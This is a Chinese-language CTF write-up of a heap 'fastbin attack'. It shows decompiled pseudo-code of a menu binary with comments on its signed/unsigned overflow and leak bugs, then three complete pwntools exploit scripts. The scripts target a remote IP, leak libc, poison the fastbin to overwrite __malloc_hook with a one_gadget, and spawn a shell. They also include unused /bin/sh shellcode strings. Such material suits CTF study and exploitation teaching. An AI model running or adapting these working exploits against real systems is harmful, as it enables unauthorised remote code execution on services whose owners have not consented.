PWN-fastbin attack

IDA

1.menu（反编译未贴出；下面 EXP 脚本使用的菜单编号为 1=add、2=delete、3=show、4=edit，与本文的小节编号不同）

2.ADD

/*
 * IDA pseudo-code of the binary's "add" handler (menu option 1).
 * Allocates one fixed-size chunk into the first free slot of the global
 * pointer table `ptr` and records its size in `Size`.
 * The return value is the decompiler's rendering of the stack-protector
 * check, not a meaningful result.
 */
unsigned __int64 add()
{
  unsigned int i; // [rsp+8h] [rbp-1018h]
  unsigned int v2; // [rsp+Ch] [rbp-1014h]  -- only assigned when a free slot is found
  char v3[4096]; // [rsp+10h] [rbp-1010h] BYREF  -- zeroed below but otherwise unused here
  unsigned __int64 v4; // [rsp+1018h] [rbp-8h]

  v4 = __readfsqword(0x28u); // stack canary (fs:0x28)
  memset(v3, 0, sizeof(v3));
  // Scan the 10 slots ptr[0..9] for the first NULL entry.
  for ( i = 0; i <= 9; ++i )
  {
    if ( !*(&ptr + i) )
    {
      v2 = i;
      break;
    }
  }
  // BUG: when every slot is taken the loop exits with i == 10, so this
  // guard can never fire; v2 is then used uninitialized as the slot index.
  // The check should be `i == 10` (or v2 should be initialised and tested).
  if ( i == 11 )
  {
    puts("wrong");
    exit(0);
  }
  *(&ptr + v2) = malloc(0x60uLL); // every allocation is the same fixed size
  Size[v2] = 96;
  puts("Done");
  return __readfsqword(0x28u) ^ v4; // canary check
}

3.EDIT

/*
 * IDA pseudo-code of the "edit" handler (menu option 4).
 * Reads an index and a byte count from stdin, then reads that many bytes
 * from stdin straight into the chunk at ptr[index].
 */
unsigned __int64 edit()
{
  int nbytes; // [rsp+0h] [rbp-10h] BYREF  -- signed: parsed with "%d"
  unsigned int nbytes_4; // [rsp+4h] [rbp-Ch] BYREF  -- slot index; never range-checked
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u); // stack canary
  puts("Index:");
  __isoc99_scanf("%d", &nbytes_4);
  puts("Size:");
  __isoc99_scanf("%d", &nbytes);
  // BUG (signed/unsigned mismatch): the upper bound is tested on the signed
  // value, so any negative size passes; the cast in the read() call below
  // then turns it into a length of up to 0xffffffff, far beyond the
  // 0x60-byte chunk. The fix is to also reject nbytes < 0 here, or to
  // compare against Size[nbytes_4] as an unsigned value.
  if ( nbytes <= 96 )
  {
    // Only a NULL test: there is no check that nbytes_4 < 10, so a large
    // index dereferences whatever lies past the ptr table.
    if ( *(&ptr + nbytes_4) )
    {
      puts("Content:");
      read(0, *(&ptr + nbytes_4), (unsigned int)nbytes); // return value ignored; no NUL terminator is written
    }
    else
    {
      puts("wrong");
    }
  }
  else
  {
    puts("wrong!");
  }
  return __readfsqword(0x28u) ^ v3; // canary check
}

有符号与无符号整型混用导致的整数溢出：`nbytes <= 96` 按有符号 int 比较，而传给 read() 的长度是 `(unsigned int)nbytes`，因此负数会通过检查并变成一个极大的读取长度。

4.Show

/*
 * IDA pseudo-code of the "show" handler (menu option 3).
 * Prints the chunk at ptr[index] as a C string.
 */
unsigned __int64 show()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF  -- slot index; never range-checked
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u); // stack canary
  puts("Index:");
  __isoc99_scanf("%d", &v1);
  // Only a NULL test on the pointer (no `v1 < 10` check). "%s" prints up to
  // the first NUL byte, and edit() never writes a terminator, so a fully
  // written chunk discloses whatever memory follows it -- this is the
  // information leak the EXP scripts below rely on. Printing exactly
  // Size[v1] bytes with fwrite() would close it.
  if ( *(&ptr + v1) )
    printf("Content: %s\n", (const char *)*(&ptr + v1));
  return __readfsqword(0x28u) ^ v2; // canary check
}

5.delete

/*
 * IDA pseudo-code of the "delete" handler (menu option 2).
 * Frees ptr[index] and clears both the pointer and its Size entry.
 */
unsigned __int64 delete()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF  -- slot index
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u); // stack canary
  puts("Index:");
  __isoc99_scanf("%d", &v1);
  // The range check admits indices 0..11, although add() only ever fills
  // ptr[0..9]; for 10 and 11 whatever 8-byte value sits past the table is
  // handed to free(). free(NULL) is a no-op, so deleting an empty slot is safe.
  if ( v1 > 0xB )
  {
    puts("wrong");
    exit(0);
  }
  free(*(&ptr + v1));
  // Pointer and size are both cleared, so this path leaves no dangling entry.
  *(&ptr + v1) = 0LL;
  Size[v1] = 0;
  return __readfsqword(0x28u) ^ v2; // canary check
}

EXP

from pwn import *
#io=process("./pwn")
# Connection handle (the commented-out line runs the local binary instead)
# plus the ELF and libc objects used for symbol lookup below.
io=remote("106.54.163.94", 20017)
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")

def dbg():
	"""Attach gdb to the live target process, then block until the operator resumes."""
	gdb.attach(io)
	pause()

def cmd(choice):
	"""Consume the menu prompt, then send `choice` as a decimal line."""
	selection = str(choice)
	io.recvuntil(">>")
	io.sendline(selection)

def add():
	"""Menu option 1: allocate one fixed-size chunk into the first free slot."""
	option = 1
	cmd(option)

def delete(index):
	"""Menu option 2: free the chunk held in slot `index`."""
	cmd(2)
	prompt = "Index:"
	io.recvuntil(prompt)
	io.sendline(str(index))

def show(index):
	"""Menu option 3: print slot `index` (the binary prints it with "%s")."""
	cmd(3)
	prompt = "Index:"
	io.recvuntil(prompt)
	io.sendline(str(index))

def edit(index,size,content):
	"""Menu option 4: select slot `index`, declare `size` bytes, then send `content` raw."""
	cmd(4)
	for prompt, value in (("Index:", index), ("Size:", size)):
		io.recvuntil(prompt)
		io.sendline(str(value))
	io.recvuntil("Content:")
	io.send(content)

add()#0
add()#1
add()#2
add()#3
# A size of -1 passes edit()'s signed `nbytes <= 96` check and reaches read()
# as an unsigned length, so the payload runs past chunk 0's 0x60 bytes (the
# signed/unsigned bug noted above).
payload=b'A'*0x60+p64(0)+p64(0xe1)
edit(0,-1,payload)
delete(1)
add()#1
show(2)
# The -88-0x10 adjustment and the 0x4527a gadget offset are hard-coded for the
# bundled libc-2.23.so and must be recomputed for any other build.
malloc_hook=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88-0x10
print('malloc_hook:'+hex(malloc_hook))
base=malloc_hook-libc.sym['__malloc_hook']
onegadget=base+0x4527a
delete(1)
edit(0,-1,b'A'*0x60+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add()#1
add()#4
edit(4,-1,b'\x00'*0x13+p64(onegadget))
add()
# dbg() is defined above but never called.

io.interactive()
from pwn import *
# log_level='debug' echoes every byte exchanged, which is the easiest way to
# see which step diverges when a run fails.
context(os='linux', arch='amd64', log_level='debug')

#io = process("./pwn")
io = remote("106.54.163.94", 20017)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")

def add():
	"""Menu option 1: allocate a chunk into the first free slot."""
	option = "1"
	io.sendlineafter(">> ", option)

def delete(idx):
	"""Menu option 2: free slot `idx`."""
	steps = ((">> ", "2"), ("Index:", str(idx)))
	for prompt, line in steps:
		io.sendlineafter(prompt, line)

def show(idx):
	"""Menu option 3: print slot `idx`."""
	steps = ((">> ", "3"), ("Index:", str(idx)))
	for prompt, line in steps:
		io.sendlineafter(prompt, line)

def edit(idx, size, content):
	"""Menu option 4: select `idx`, declare `size`, then send `content` (sendlineafter appends '\\n')."""
	io.sendlineafter(">> ", "4")
	for prompt, value in (("Index:", idx), ("Size:", size)):
		io.sendlineafter(prompt, str(value))
	io.sendlineafter("Content:", content)

def attach():
	"""Attach gdb to the target and block until the operator resumes."""
	gdb.attach(io)
	pause()

# leak libc_base
add()  #0
add()  #1
add()  #2
add()  #3

# -1 passes edit()'s signed size check and becomes a huge unsigned length for
# read() (the signed/unsigned bug); note sendlineafter also appends '\n'.
edit(0, -1, b'\x00'*0x68 + p64(0x70*2+1))
delete(1)
add()  #1
show(2)
# 0x3c4b78 is a hard-coded offset for the bundled libc-2.23.so; verify it
# against that exact build before reusing the script elsewhere.
libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) - 0x3c4b78
print("[+]libc base = " + str(hex(libc_base)))

malloc_hook = libc_base + libc.symbols['__malloc_hook']
fake_chunk = malloc_hook - 0x23
# one_gadget offsets for libc-2.23 (listed with their constraints in the third
# script); only sh[1] is used here.
sh = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

delete(1)
edit(0, -1, b'\x00'*0x68 + p64(0x71) + p64(fake_chunk))
add()  #1
add()  #4  fake_chunk
# 0x30 passes the size check legitimately; the content is 0x1b bytes plus the
# newline, well under it.
edit(4, 0x30, b'\x00'*0x13 + p64(libc_base + sh[1])) # modify
add()  #trigger
io.interactive()
#encoding = utf-8
from pwn import *
from LibcSearcher import * 

context(log_level = 'debug', os = 'linux', arch = 'amd64')

# Target selector: 1 = run under the supplied ld.so with the bundled libc
# preloaded, 2 = plain local process, anything else = remote. Note the
# three branches mix tab and 4-space indentation; normalise before editing.
local = 3
if local == 1 :
	sh = process([b"./ld.so", b"./pwn"], env = {"LD_PRELOAD" : b"./libc.so.6"})
elif local == 2 :
    sh = process("./pwn")
else :
	sh = remote('106.54.163.94', 20017)

elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')

def dbg():
    """Attach gdb to the target process and block until resumed."""
    gdb.attach(sh)
    pause()

# Short aliases for the pwntools I/O calls used below:
# s/sa/sl/sla = send, sendafter, sendline, sendlineafter; r/ru = recv, recvuntil.
s       = lambda data               :sh.send(data)
sa      = lambda text, data         :sh.sendafter(text, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda text, data         :sh.sendlineafter(text, data)
r       = lambda num                :sh.recv(num)
ru      = lambda text               :sh.recvuntil(text)
# uu32/uu64: read up to the 0xf7 / 0x7f byte and unpack the preceding 4 / 6
# bytes as a little-endian address.
uu32    = lambda                    :u32(sh.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64    = lambda                    :u64(sh.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
# lg resolves the variable *name* with eval(), so pass only literal identifiers
# (as the calls below do); lgl takes the value directly and avoids eval.
lg      = lambda s                  :sh.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
lgl     = lambda s, value           :sh.success('\033[32m%s -> 0x%x\033[0m' % (s, value))

# Stock shellcode strings carried over from a template; nothing in this
# script references them (and they are str, not bytes, literals).
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes

#------------------------------------------------------------------------------------------------------#

# Bare string expression (no runtime effect): one_gadget output for the
# bundled libc-2.23.so, kept as a reference. Only 0x4527a is used below.
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

def add():
    """Menu option 1: allocate one fixed-size chunk (the binary's add() calls malloc(0x60))."""
    option = b'1'
    sla('>> ', option)

def delete(idx):
    """Menu option 2: free slot `idx`."""
    for prompt, line in (('>> ', b'2'), ('Index:', str(idx))):
        sla(prompt, line)

def show(idx):
    """Menu option 3: print slot `idx`."""
    for prompt, line in (('>> ', b'3'), ('Index:', str(idx))):
        sla(prompt, line)

def edit(idx, size, content):
    """Menu option 4: select `idx`, declare `size`, then send `content` raw (no newline)."""
    sla('>> ', b'4')
    for prompt, value in (('Index:', idx), ('Size:', size)):
        sla(prompt, str(value))
    sa('Content:', content)

add()   # 0
add()   # 1
add()   # 2
add()   # 3
add()   # 4
add()   # 5

# -1 passes edit()'s signed `nbytes <= 96` check and reaches read() as an
# unsigned length, so the write runs past chunk 0 (the signed/unsigned bug).
pld = b'\x00' * 0x68 + p64(0x70 * 2 + 1)
edit(0, -1, pld)
delete(1)
add()   # 1
show(2)

# 0x3c4b78 and 0x4527a are hard-coded for the bundled libc-2.23.so; recompute
# them for any other build.
libc_base = uu64() - 0x3c4b78
lg('libc_base')
ogg = libc_base + 0x4527a
malloc_hook = libc_base + libc.sym['__malloc_hook']
fake_chunk = malloc_hook - 0x20 - 3
lg('malloc_hook')
lg('fake_chunk')

# Same overflow again, this time from slot 3 into the freed slot 4.
delete(4)
pld = b'\x00' * 0x68 + p64(0x71) + p64(fake_chunk)
edit(3, -1, pld)

add()   # 4
add()   # 6  (slots 0-5 are occupied, so add() takes the next free slot)
pld = b'\x00' * (0x10 + 3) + p64(ogg)
edit(6, -1, pld)
# dbg()
add()

sh.interactive()
